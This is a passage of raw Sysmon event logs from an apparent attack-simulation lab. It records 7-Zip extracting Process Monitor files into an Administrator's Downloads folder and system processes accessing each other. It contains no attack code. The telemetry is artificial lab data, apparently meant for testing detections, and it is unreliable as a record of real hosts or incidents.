DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-11C1-6216-5F04-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11C1-6216-5F04-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.499{4F8D34B0-11C1-6216-5F04-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x8000000000000000288654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localDownloads2022-02-23 10:51:46.943{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exeC:\Users\Administrator\Downloads\Eula.txt2022-02-23 10:51:46.943 11241100x8000000000000000288653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localDownloads2022-02-23 10:51:46.912{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exeC:\Users\Administrator\Downloads\Procmon64a.exe2022-02-23 10:51:46.912 10341000x8000000000000000288652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.890{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.888{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.888{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.888{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.887{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.887{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.884{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.877{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.876{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000288643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localDownloads2022-02-23 10:51:46.874{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exeC:\Users\Administrator\Downloads\Procmon64.exe2022-02-23 10:51:46.873 10341000x8000000000000000288642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.871{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000288641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localDownloads2022-02-23 10:51:46.871{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exeC:\Users\Administrator\Downloads\procmon.chm2022-02-23 10:51:46.871 10341000x8000000000000000288640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.870{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.870{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.870{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000288637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localDownloads2022-02-23 10:51:46.826{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exeC:\Users\Administrator\Downloads\Procmon.exe2022-02-23 10:51:46.826 10341000x8000000000000000288636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.823{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.811{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.805{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.801{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.798{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.794{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.544{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5C9DF3075825A579A81336490565660,SHA256=B3E6658DFEB580055462B6BAFE232F005E22CA40E722331518F30C6B68942036,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:46.139{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A92EDBC1E543B3A3C93A81C2DE7B5B3D,SHA256=C400B2EBB8F8FD69A30538534A2EBE7299BC5509E72510D06724235AAC256DA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:46.014{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 